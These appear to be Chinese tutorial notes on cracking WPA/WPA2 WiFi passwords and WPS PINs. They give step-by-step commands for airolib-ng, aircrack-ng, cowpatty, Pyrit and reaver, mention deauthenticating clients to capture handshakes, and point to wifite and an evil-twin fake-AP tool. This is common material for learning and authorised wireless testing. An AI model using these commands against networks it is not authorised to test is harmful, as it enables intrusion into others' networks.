Airolib
設計用於存儲ESSID和密碼列表,計算生成不變的PMK(計算資源消耗型)
PMK在破解階段被用於計算PTK(速度快,計算資源要求少)
通過完整性摘要值破解密碼SQLite3數據庫存儲數據
實例:
抓包獲取四步信息
echo 目標ESSID > essid.txt(創建一個ESSID文件)
airolib-ng db --import essid essid.txt(創建一個數據庫db,導入一個essid,這個essid文件存在essid.txt文件里)
airolib-ng db --stats(查看數據庫狀態)
airolib-ng db --import passwd /usr/share/wordlists/xxx.txt(導入密碼文件,它會剔除不合格的密碼)
airolib-ng db --batch(生成PMK)
aircrack-ng -r db test-01.cap(通過抓取到的包對比db數據庫里面的PMK破解密碼)
Cowpatty破解密碼
一樣的,先抓包獲取四步信息
cowpatty -r xx-01.cap -f password.txt -s 目標essid (-r 指定抓到包的文件,-f 使用的字典,-s 目標essid)
使用彩虹表(PMK)
genpmk -f password.txt -d pmk -s 目標essid (-f 使用的字典 -d生成的pmk文件名 -s 目標essid)
cowpatty -r xx-01.cap -d pmk -s 目標essid (-r 指定抓到包的文件,-d 指定pmk文件,-s 目標essid)
Pyrit破解密碼
與airolib,cowpatty相同,支持基於預計算的pmk提高破解速度
獨有的優勢:
CPU外,可以運用GPU的計算能力加速生成PMK,本身支持抓包獲取四步握手過程,無需airodump抓包
也支持傳統的讀取airodump抓包獲取四步握手的方式
實例:
pyrit -r wlan0mon -o wap.cap stripLive (-r 指定抓包的網卡,-o 輸出文件名 stripLive是踢出多余的信息)
然后配合aireplay-ng把目標打掉,獲取四步信息
會生成一個抓包文件
分析包(analyze)
從airodump抓包導入並篩選提取出新的包,剔除多余的信息
會生成新的包
可以直接用密碼字典破解,但是沒靈魂,使用數據庫模式破解
默認基於文件的數據庫,支持sql數據庫,將計算的PMK存入數據庫
查看默認數據庫狀態:pyrit eval
導入密碼字典:pyrit -i password.txt import_passwords(會剔除不合格的密碼)
指定ESSID:pyrit -e ESSID名 create_essid (創建essid)
計算PMK:pyrit batch (發揮GPU計算能力)
破解密碼:pyrit -r wap01.cap -b APmac attack_db
實例:
導入密碼文件
查看可用密碼文件
創建essid
計算PMK
破解密碼
WPS攻擊
WPS是wifi聯盟2006年開發的一項技術,通過pin碼來簡化無線接入的操作,無需記住PSK,路由器和網卡名各按一個按鈕就能接入無線.pin碼是分為前后各4位的2段共8位數字
2011年被發現安全漏洞,接入發起方可以根據路由器的返回信息判斷前4位是否正確,而pin碼的后四位只有1000種定義的組合(最后一位是checksum),所以全部窮舉破解只需要11000次嘗試,(PSK 218,340,105,584,896),標准本身沒有設定鎖定機制,目前多個廠商已實現鎖定機制
wash -i wlan0mon (發現支持wps的無線)
airodump-ng wlan0mon --wps (也可以加上--wps參數)
爆破PIN碼
reaver -i wlan0mon -b APmac -vv
爆破出pin碼后
reaver -i wlan0mon -b APmac -vv -p PIN碼
綜合自動化無線密碼破解工具:wifite
ctrl+c停止掃描,選擇目標
它會自動逐個嘗試,WPS,握手包等等
偽造AP:3vilTwinAttacker https://github.com/wi-fi-analyzer/3vilTwinAttacker.git
友情鏈接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn